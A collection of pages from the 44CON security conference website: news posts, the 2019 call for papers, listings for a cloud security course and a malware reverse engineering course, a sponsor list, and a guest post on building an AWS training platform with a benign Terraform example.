Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

More 2018 44CON Videos Added

This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them.

First Videos From 44CON 2018 Up

For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course? And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.


Hacking 44CON’s Pricing Model (5 Different Ways)

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?”

44CON 2019 Early-Bird Tickets are now on sale

Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

44CONnect – A 1-day invite-only event in March 2019

44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

To qualify for an invite, you need to have done one of the following:

There are 20 tickets available, so make sure you qualify!

Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

*Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

#####EOF##### Cloud Security and DevSecOps Workshop – 44CON

Cloud Security and DevSecOps Workshop

Presented By: Paul Schwarzenberger

Public cloud services are now mainstream, and growing at a massive rate, as organisations launch new applications in the cloud and migrate existing systems. Along with the rapid move to the cloud, there is an equally revolutionary shift to DevOps, infrastructure as code, and adoption of agile software development approaches.

Taken together, broad access to public cloud services, combined with the dynamic nature of DevOps, introduces a multitude of new risks, methods of attack and potential security issues.

This course provides a hands-on introduction to cloud security and DevSecOps, covering new attack vectors and risks, common mistakes and misconfigurations. Methods of protecting applications and data in the cloud are explored, ranging from secure cloud architectures, to security tests integrated to continuous integration pipelines, cloud security services, continuous cloud compliance, and automated cloud security operations.

The 2 day course will take place on the 6th & 7th June 2019 in London.
The price is £1,300 (inc VAT). Book your place in our shop now.

Learning Objectives

  • Knowledge of AWS and Azure services, secure architectures and best practice
  • Hands-on experience of AWS and Azure security features and services
  • Understanding DevSecOps approaches, technologies and tools
  • Practical use of CI/CD pipelines incorporating security testing
  • Container and serverless architectures, security issues and controls

Course Outline

Day 1:

  • Introduction and cloud concepts
  • AWS core services
  • AWS lab – build serverless web site using CloudFormation template
  • AWS security services
  • Azure core services
  • Azure lab – deploy infrastructure and implement security improvements

Day 2:

  • Azure security services
  • Continuous compliance and automated assessment tools
  • Continuous compliance lab – assess security of an AWS account
  • Container concepts, architectures and container security
  • Serverless architectures, serverless functions, security risks and best practice
  • DevOps and DevSecOps
  • DevSecOps lab – CI/CD pipeline for serverless application with integrated tests

Target Audience

Security engineers, security architects, security operations and DevOps looking to develop their understanding of cloud security and DevSecOps with a view to designing secure systems, preventing attacks, detecting security issues and establishing automated remediation.

Penetration testers, ethical hackers and red team personnel interested in extending their knowledge of cloud security risks and issues, common misconfigurations which can be exploited, and the use of automated tools to assess security of cloud infrastructure and applications.

Student Requirements

No particular experience required, however any knowledge of cloud will be beneficial.

What to Bring

  • Laptop with Amazon Workspaces client installed (see below)
  • Mobile phone (for authenticator app)

Software Requirements

Before coming on the course, download and install the Amazon Workspaces client on your laptop from https://clients.amazonworkspaces.com/.

After installing, open the application while connected to home WiFi or a mobile network. Press the Network status symbol at the bottom right hand corner to view detailed status. Ensure that all items have a green tick as shown in the screenshots below.

Also please install the Google Authenticator app on your smartphone.

Students will be provided with

  • Amazon WorkSpaces virtual desktops for the labs, with all necessary software and tools preinstalled
  • AWS, Azure and GitHub credentials to be used responsibly during the course
  • Electronic copies of the course presentations, electronic and paper copies of lab guides

About the Trainer

Instructor – Paul Schwarzenberger @paulschwarzen

Paul is a cloud security architect and DevSecOps specialist with over 15 years’ experience leading a wide range of security-related engagements for customers across sectors including financial services, pharmaceutical, retail, education and media, logistics, UK Government and Police.

Paul uses an agile DevSecOps approach to lead the implementation and migration of critical systems to public cloud, with demanding security and compliance requirements for protection of personal data, detection and prevention of cyber-attacks and financial fraud.

Recent conference presentations include:

  • Security BSides London 2018 – How to take over a production system in the cloud
  • DevSecCon London 2018 – A journey to continuous cloud compliance
  • IISP CrestCON 2018 – Why cloud security is different

Paul has numerous security qualifications, certifications and memberships including MSc Information Security Royal Holloway, M.Inst.ISP, CCSP, CISSP and AWS Certified Security Specialty.

Book your 44CON June 2019 training course now!

#####EOF##### 44CON CFP 2019

44CON 2019 Call For Papers

This is the Call for Papers for the 9th Annual 44CON security conference, held from the 11th to 13th of September, 2019 at the ILEC Conference Centre, Lille Road, London. We invite jaded cynics, pessimists, optimists and opportunists to come together and join our broad church where the latest research of the day will be discussed, debated and debased.

44CON has two main talk tracks, a workshop track and several breakout areas including a village hall expo track, a mental health village and a village pub. Additionally, 44CON will host the ManyHats Club meetup on the evening of Thursday 12th September, which will feature its own separately organised talks. The CFP covers the two main talks and workshop tracks only.

Purchase early bird tickets (capped at 50) or sign up to our mailing list to be notified when regular tickets go on sale.

If you have any pressing queries or concerns, please get in touch.

Submissions for technical and infosec professional presentations & workshops will be accepted. Presentations are 45 minutes long with 5 minutes for Q&A. Workshops are 1-2 hours long including setup/breakdown time.

  • A presentation on the main tracks is in front of a seated audience.
  • A Workshop is like a mini training course - e.g. a 2 hour walk through Windows Kernel internals and local privilege escalation opportunities.

Talks are filmed. Workshops are not.

In particular, we are looking for original talks of the highest quality in the following areas:-

Note: this is not an exhaustive list. If you have a good talk proposal, please submit it for consideration.

  • Offensive security talks for the advanced Pentester or Red Teamer
  • Defensive talks for SOC analysts, threat hunters or enthusiastic amateur defenders
  • Talks on bugs, bug classes, finding and fixing security bugs
  • Incident Handling, Forensics and Anti-Forensics
  • Virtualisation, Container, and Cloud Computing Security
  • Cryptography, Cryptocurrencies, Cryptozoology and other Crypto-fu
  • Hardware attacks and defence tools, techniques and practices
  • Application and Mobile Security
  • Networking, Comms, Critical National Infrastructure (CNI)
  • Cyberspace, Policing, Law, Interception and Human Rights

Priority is generally given to new presentations over those presented elsewhere. If you have a presentation that you have given or will give elsewhere prior to 44CON London in September and wish to submit, please let us know in your submission, and inform us of any changes you intend to make for 44CON London.

If your talk or workshop is new, please let us know the details of other conference(s) to which you have or intend to submit through the CFP system.

It's extremely hard for a talk to get accepted to 44CON because of the small number of slots compared to the volume of high quality submissions. If your submission is not accepted, it's not a rejection of you as a speaker (except in extreme cases, in which case we'll tell you). To boost your chances, take a look at how to game the CFP and some detail on how our CFP process works.

All 44CON speakers will be entitled to the following:

  • 2-3 nights accommodation (see below)
  • Breakfast & Lunch during conference
  • Love and TLC from our awesome speaker ops team
  • Event access for both days, all nights and pre/post event drinks
  • This year we're running a Speaker's English Wine tasting (yes, you read that right) session
  • We also have a small event on the Tuesday evening that speakers are welcome to attend

Accepted primary presentation speakers get the following:

  • Paid travel (for primary speaker outside of Fulham, Putney or Central London)
  • 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights)

Accepted primary presentation speakers also presenting a workshop get the following:

  • Paid travel (for primary speaker outside of Fulham, Putney or Central London)
  • 3 nights of accommodation for the primary speaker (normally the Wednesday, Thursday and Friday nights)

Accepted primary workshop presenters without an associated talk get the following:

  • 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights)
  • Travel is not covered

In 2018 we had speakers from the UK, Australia, China, the USA, South Africa, Europe, The Middle East and more.

We welcome speakers of all genders, origins and physical abilities. If you have any particular requirements please tell us so we can accommodate them. We are a non-alcoholic, Coeliac, Vegan, Kosher, Halal and Gluten-free friendly event. Talks are to be delivered in English, only. Partners are welcome to come along and we're happy to help arrange for tourist things for you and your partners to do while in London. Please let us know should you want to do this, so we can make your time here memorable.

Official CFP open: Tuesday 26th February 2019
Final CFP deadline: Tuesday 30th April 2019, 23:59pm UTC
First accept notifications: Monday 27th May 2019
Speaker notifications start: Monday 3rd June 2019
Speaker announcements start: Wednesday 5th June 2019 @ BSides London 2019
Speaker flight details to be submitted by: Friday 19th July, 2019
Papers/Tools/Presentation submission deadline: Friday 30th August 2019
44CON Training: 9th-11th September 2019
44CON Conference: 11th-13th September 2019
#####EOF##### Building a cloud security training platform – Pt 2: Infrastructure As Code – 44CON

Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own. As I described in my last blog post I also decided to build a training platform, so that students can connect to a virtual desktop in the cloud with all the software they need pre-installed.

That way they can come on to the course with any laptop or even tablet which supports the Amazon WorkSpaces client.

The next step after the proof of concept and design was to build it using as much automation as possible – to keep cost low, I wanted to easily destroy everything as soon as a course finished, and to rebuild just before starting the next one.

I’m also taking the opportunity to demonstrate good security practice, and I’ll use the training environment as an example to show students during the course.

An important security principle is segregation, so I decided to build the training environment in its own AWS account. But I didn’t want to have yet another monthly bill. So I used AWS Organizations to create the new account:

That way, billing for all my AWS accounts is consolidated, and I can also use Service Control Policies to enforce security policies on the new account.

The next step was to create the AWS Directory Service – this is an AWS managed Active Directory which I’ll use to manage user identities, for students to log on to their Amazon WorkSpaces virtual machines. I decided to use Terraform by HashiCorp, as it’s ideal for automating infrastructure as code:

Here’s an example of the code snippet used to create the AWS Directory service:

My Terraform code included nearly all the required resources:

  • VPC, DMZ and private subnets in multiple availability zones, subnet routes
  • Network Address Translation (NAT) gateways and Internet gateway
  • Key and key alias in AWS Key Management Service
  • Virtual machine instance for Active Directory admin, security group and Elastic IP
  • Amazon Route 53 domain name for AD Admin virtual machine Elastic IP
  • Identity and Access Management (IAM) policy and role for AD admin virtual machine
  • AWS Systems Manager templates for domain join and Windows feature setup
  • Secrets in AWS Secrets Manager for user passwords – more on this later

The one exception is Amazon WorkSpaces, as these are not supported by Terraform at the time of writing.

I typed “terraform apply” and about 30 minutes later the infrastructure was built in the new AWS account, and I could see all the resources in the portal. Here’s the AWS Directory service built from the code snippet above:

After some troubleshooting, I succeeded in automating the domain join of the AD Admin Windows Server 2016 virtual machine, using an AWS Systems Manager document template. I also created some automation templates to set up the Windows feature for Active Directory administration tools, and to install the AWS PowerShell Module, so I could use these later.

Then, I logged in to the AD admin virtual machine using Microsoft Remote Desktop with my domain admin credentials:

Opening Active Directory Users and Computers, I could see the AWS Directory domain.

All I needed now was some automation scripts to create users, and then build the Amazon Workspaces. I’ll cover these in my next post.
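
The Terraform snippet for the directory did not survive on this page. As an added example (not the author's code, and written in current Terraform syntax), the following shows one way to create an AWS Managed Microsoft AD together with the subnets, KMS key and Secrets Manager secret from the resource list above; the region, CIDR ranges, resource names and domain name are all assumed placeholders.

```hcl
# Added example, not the author's code. Region, CIDR ranges, resource names
# and the domain name are placeholders chosen for illustration.
terraform {
  required_providers {
    aws    = { source = "hashicorp/aws" }
    random = { source = "hashicorp/random" }
  }
}

provider "aws" {
  region = "eu-west-1" # assumed region
}

data "aws_availability_zones" "available" {
  state = "available"
}

resource "aws_vpc" "training" {
  cidr_block           = "10.0.0.0/16"
  enable_dns_support   = true
  enable_dns_hostnames = true
}

# AWS Managed Microsoft AD needs two subnets in different availability zones.
resource "aws_subnet" "private" {
  count             = 2
  vpc_id            = aws_vpc.training.id
  cidr_block        = cidrsubnet(aws_vpc.training.cidr_block, 8, count.index + 10)
  availability_zone = data.aws_availability_zones.available.names[count.index]
}

# Customer-managed key and alias used to encrypt the stored secret.
resource "aws_kms_key" "training" {
  description             = "Training platform secrets"
  enable_key_rotation     = true
  deletion_window_in_days = 7 # shortest window KMS allows
}

resource "aws_kms_alias" "training" {
  name          = "alias/training-platform"
  target_key_id = aws_kms_key.training.key_id
}

# Generate the directory Admin password instead of hard-coding it.
resource "random_password" "ad_admin" {
  length           = 32
  min_lower        = 2
  min_upper        = 2
  min_numeric      = 2
  min_special      = 2
  override_special = "!#%*-_=+"
}

resource "aws_secretsmanager_secret" "ad_admin" {
  name       = "training/ad-admin-password"
  kms_key_id = aws_kms_key.training.arn

  # Delete immediately on "terraform destroy" so that the same secret name
  # can be recreated when the environment is rebuilt for the next course.
  recovery_window_in_days = 0
}

resource "aws_secretsmanager_secret_version" "ad_admin" {
  secret_id     = aws_secretsmanager_secret.ad_admin.id
  secret_string = random_password.ad_admin.result
}

# The managed Active Directory itself.
# Note: the generated password is also written to the Terraform state file,
# so keep state in an encrypted backend with tightly restricted access.
resource "aws_directory_service_directory" "training" {
  name     = "corp.training.example"
  password = random_password.ad_admin.result
  edition  = "Standard"
  type     = "MicrosoftAD"

  vpc_settings {
    vpc_id     = aws_vpc.training.id
    subnet_ids = aws_subnet.private[*].id
  }
}

output "directory_id" {
  value = aws_directory_service_directory.training.id
}
```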

#####EOF##### Malware Reverse Engineering – 44CON

Malware Reverse Engineering

Presented By: Joxean Koret

This course provides effective knowledge and hands-on experience of basic malware analysis. It introduces current and relevant techniques that will prepare students to become proficient malware researchers, making heavy use of IDA Pro.

This 2 day course will take place on the 11th & 12th March 2019 in London.
The price is £1,300 (inc VAT). Book your place in our shop now.

Learning Objectives

  • Understand Windows fundamentals
  • Develop reverse engineering skills
  • Gain familiarity with standard tools like IDA and Volatility
  • Reverse engineer real-world malware

Course Outline

Day 1:

  • Introduction to malware
  • Windows fundamentals
  • Executable file formats (PE)
  • Introduction to reverse engineering
  • Introduction
  • Tools & setting up a reverse engineering lab.
  • Brief Introduction to Graph theory
  • Static Analysis: from C to assembler
  • Manual Code reconstruction: from (any) assembler to C

Day 2:

  • Unpacking
  • Static unpacking
  • IDAPython.
  • Hands on various malwares.
  • Dynamic unpacking
  • Manual reconstruction
  • IDA Python batch automation
  • Memory dumping and analysis with volatility

Target Audience

Security staff working in, or looking to work in blue teams on malware analysis, and those with a keen interest in reverse engineering, but without the free time dedicated to developing their skills.

Student Requirements

  • Knows C
  • Knowledge of assembly language (x86, ARM, …) is advantageous but isn’t required

What to Bring

  • A working laptop (no Netbooks, no Tablets, no iPads)
  • Intel Core i3 (equivalent or superior) required
  • 8GB RAM required, at a minimum
  • Wireless network card
  • 60 GB free Hard disk space
  • If you’re using a Macbook or Macbook Pro, please bring your dongles!

Software Requirements

  • Ubuntu Linux installed either on the laptop or on a VM
  • Microsoft Windows as a VM
  • Legal version of IDA (7.0 or higher)

Students will be provided with

Copies of the course including all exercises and Virtual Machine images used during the course.

About the Trainer

LEAD INSTRUCTOR – Joxean Koret @matalaz

Joxean Koret has been working for more than 15 years in many different computing areas. He started working as database software developer and DBA for a number of different RDBMS.

Afterwards he got interested in reverse engineering and applied this knowledge to the DBs he was working with, for which he has discovered dozens of vulnerabilities in products from the major database vendors, especially in Oracle software.

He also worked in other security areas like malware analysis and anti-malware software development for an Antivirus company or developing IDA Pro at Hex-Rays.

Book your 44CON Spring 2019 training course now!

#####EOF##### 44CON Sponsors – 44CON

44CON Sponsors

If you would like to sponsor 44CON 2019, our 44CON 2019 Sponsor Pack provides all the information you will need about sponsoring the conference. If you have any questions, please email Sponsor Ops who will be happy to help.

Last year’s sponsors, at 44CON 2018.

 

Gold Sponsors

BT

www.bt.com

HackerOne

www.hackerone.com

Tenable

www.tenable.com

Silver Sponsors

Microsoft

www.microsoft.com

 

Crowdfense

www.crowdfense.com

 

Exhibitors

Bugcrowd

www.bugcrowd.com

Botprobe

botprobe.co.uk

Google

google.com

Tigerscheme

www.tigerscheme.org

Twitter: @tiger_scheme

CheckSec

www.checksec.com

SuperAwesome

www.superawesome.tv

safepass.me

safepass.me

Cortex Insight

cortexinsight.com

Event Supporters

Integrity

www.integrity.pt

Community Sponsors

CREST

www.crest-approved.org

ISSA-UK

www.issa.org

RawHex

rawhex.com

OWASP

www.owasp.org

Event Partners
#####EOF##### crestcon – 44CON
#####EOF##### training – 44CON

Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course? And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.



#####EOF##### 44CON 2019 CFP Now Open – 44CON

44CON 2019 CFP Now Open

The Call For Papers for 44CON 2019 is now open. Submissions will be gratefully received on our CFP System. We’re interested in receiving submissions for workshops and talks.

The CFP covers our two dedicated talk tracks and our workshop track. There will also be an expo track in our village hall, as well as events in the mental health hackers village, and the village pub including the ManyHats club meetup on the Thursday evening, but these are not covered by the CFP process.

Talking slots are 45 minutes long, while workshops are 1 or 2 hours in length. Each submitter will receive individually collated and hand-typed artisanal feedback from Steve, our blackmailCFP admin via email.

As usual, speakers from outside of Fulham, Putney or Zone 1 will have their travel and accommodation covered by us. Our CFP notice below provides further details on how this all works, and what accepted speakers receive. If you’re interested in submitting, read the CFP notice below, and check out our 2017 guide to gaming the 44CON CFP.

44CON is the UK's premier annual technical security conference and training event. From the evening of the
11th of September till the 13th of September 2019, expect a top-tier international technical conference
with fast wifi, loose 0day, a village pub and of course, Gin O'Clock.

       __ __  __ __  __________  _   __   
      / // / / // / / ____/ __ \/ | / / | "You can hack us
     / // /_/ // /_/ /   / / / /  |/ /  |  You can breach us
    /__  __/__  __/ /___/ /_/ / /|  /   |  But you'll have to answer to
      /_/    /_/  \____/\____/_/ |_/    |  Oh, the pwns of Brompton"

-o-     Straight Outta Brompton     -o- | 11th - 13th September 2019
-o- As monitored by the famous GCHQ -o- | ILEC, 47 Lillie Rd, London SW6 1UD

]-- 44CON 2019 Call For Papers

Site: https://44con.com/
CFP: https://cfp.44con.com/
Tickets *available now*: https://shop.44con.com/

This is the Call for Papers for the 9th Annual 44CON security conference, held from the 11th to 13th of
September, 2019. We invite jaded cynics, pessimists, optimists and opportunists to come together and join
our broad church where the latest research of the day will be discussed, debated and debased.

44CON has two main talk tracks, a workshop track and several breakout areas including a village hall expo
track, a mental health village and a village pub. Additionally, 44CON will host the ManyHats Club meetup
on the evening of Thursday 12th September, which will feature its own talks. The CFP covers the two main
talks and workshop tracks only.

Submissions for technical and infosec professional presentations & workshops will be accepted. Presentations
are 45 minutes long with 5 minutes for Q&A. Workshops are 1-2 hours long including setup/breakdown time.

* A presentation on the main tracks is in front of a seated audience.
* A Workshop is like a mini training course - e.g. a 2 hour walk through Windows Kernel internals and local
privilege escalation opportunities.

Talks are filmed. Workshops are not.

This is NOT a call for training. Training takes place separately, see here for details:
44CON Training
At the time of writing September's training slots are full, but we are accepting expressions of interest for
our December and Spring 2020 training sessions.

]-- Submissions

Submissions should be sent via the CFP website https://cfp.44con.com/. Submissions sent via email, post or
RFC1149 compliant avian carrier will not be accepted.

In particular, we are looking for original talks of the highest quality in the following (but not exclusive)
areas:

* Offensive security talks for the advanced Pentester or Red Teamer
* Defensive talks for SOC analysts, threat hunters or enthusiastic amateur defenders
* Talks on bugs, bug classes, finding and fixing security bugs
* Incident Handling, Forensics and Anti-Forensics
* Virtualisation, Container and Cloud Computing Security
* Cryptography, Cryptocurrencies, Cryptozoology and other Crypto-fu
* Hardware attacks and defence tools, techniques and practices
* Application and Mobile Security
* Networking, Comms, Critical National Infrastructure (CNI)
* Cyberspace, Policing, Law, Interception and Human Rights

Note: this is not an exhaustive list. If you have what you think is a good talk proposal, please submit it
through the CFP system.

Priority is generally given to new presentations over those presented elsewhere. If you have a presentation
that you have given or will give elsewhere prior to 44CON London in September and wish to submit, please let
us know in your submission, and inform us of any changes you intend to make for 44CON London.

If your talk or workshop is new, please let us know the details of other conference(s) to which you have or
intend to submit through the CFP system.

]-- Maximising your odds of getting selected

Some information on how our CFP process works is here:
The 44CON CFP just closed. You won’t believe what happens next.
Some tips on how to game the process are available here:
How to game the 44CON CFP

Your submission will be up against over 200 others competing for about 20 talking slots. Our 20 reviewers
from around the globe vote based on what they can see. After the CFP closes, Steve collates the feedback and
individually emails each submitter personally.

We expect accepted submissions to score an *average* of 4.25/5 or higher. This means that perfectly good
talks don't get selected. If this happens to you, please don't be upset. Not getting into 44CON is a badge of
honour, and comes with (hopefully) useful feedback for you to try again some other time.

]-- Speaker McPrivilegesFace

All speakers at 44CON London will be entitled to the following:

* 2-3 nights accommodation (see below)
* Breakfast & Lunch during conference
* Love and TLC from our awesome speaker ops team
* Event access for both days, all nights and pre/post event drinks
* This year we're running a Speaker's English Wine tasting (yes, you read that right) session
* We also have a small event on the Tuesday evening that speakers are welcome to attend

Accepted primary presentation speakers get the following:

* Paid travel (for primary speaker outside of Fulham, Putney or Central London)
* 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights)

Accepted primary presentation speakers also presenting a workshop get the following:

* Paid travel (for primary speaker outside of Fulham, Putney or Central London)
* 3 nights of accommodation for the primary speaker (normally the Wednesday, Thursday and Friday nights)

Accepted primary workshop presenters without an associated talk get the following:

* 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights)
* Travel is not covered

We welcome speakers of all genders, origins and physical abilities. If you have any particular requirements
please tell us so we can accommodate them. We are a non-alcoholic, Coeliac, Vegan, Kosher, Halal and
Gluten-free friendly event.

Talks are to be delivered in English, only. Partners are welcome to come along and we're happy to help
arrange for tourist things for you and your partners to do while in London. Please let us know should you
want to do this, so we can make your time memorable.

In 2018 we had speakers from the UK, Australia, China, the USA, South Africa, Europe, The Middle East and
more.

]-- Submissions process

Submit your CFP response at the CFP Site https://cfp.44con.com/. Submissions must be in English only. Please
ensure that your home country is specified in your submission, so we know where to fly you in from. Please do
not email or message the crew with submissions - they will not be accepted.

If you are submitting a workshop proposal, please provide details of attendee requirements such as minimum
technical knowledge, hardware/software required etc.

]-- Important dates

* CFP Opens Thursday 26th February
* CFP Closes 23:59:59 BST 30th April
* First round speaker announcements start Monday 3rd June
* Final Speaker announcements: Tuesday 18th June
* Speaker flight details to be submitted by 19th July
* Papers/Tools/Presentation Submission Deadline: Friday 30th August
* 44CON London Training: 9th/10th/11th September
* 44Café evening event: 10th September
* 44CON London Conference: 11th, 12th and 13th September

]-- Other Information

To find out more about 44CON London visit http://44con.com/, follow us on twitter @44CON, or use the #44CON
hashtag and take part in the discussion on Twitter. Tickets are available now from the main web site at
https://shop.44con.com/.

For an idea of what to expect, watch some videos from previous 44CON Events at https://www.youtube.com/44contv

By agreeing to speak at 44CON 2019 you are granting Sense/Net Ltd (owners of 44CON) the rights to reproduce
and distribute your presentation and recording (unless otherwise agreed in writing in advance of the event)
including but not limited to http://44con.com/, advertisements in various mediums and through partner sites
and mediums. If you are not comfortable with this arrangement then this must be agreed with us in writing
prior to the event.

It is imperative that, once you have agreed to speak at 44CON London, you regularly monitor your nominated
e-mail account, so that we can complete the necessary supporting activities such as booking flights,
accommodation etc. Failure to take reasonable steps to support us in minimising costs in these areas may
result in your talk being withdrawn.

.------------------------------------------------------------------------------.
|                                                                              |
|            Software Failure. Press left mouse button to continue.            |
|                      Guru Meditation #00070000.48454C50                      |
|                                                                              |
'------------------------------------------------------------------------------'

 


#####EOF##### cfp – 44CON

The 44CON CFP just closed. You won’t believe what happens next.

Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.


How to game the 44CON CFP

Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

TL;DR – I want to speak at 44CON

Ok, then do these things to boost your chances:

  1. Submit a workshop with your talk
  2. Make it clear where else you’ve submitted and/or might/will submit
  3. Include links to other talks you’ve done, video if you have it
  4. Get your talk in early for a better chance of scoring higher
  5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

Understanding how the CFP works

The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

Scoring and voting

Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

Why does it take so long to find out if I’m accepted?

If you’re not sure what’s happening, contact us and we’ll give you an update.

Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5. What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

Wait, isn’t 44CON a two-track conference?

All speakers dress like this when preparing submissions.

Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list; however, sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first served basis.

Hacking the process

Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

Submit both Talks and Workshops

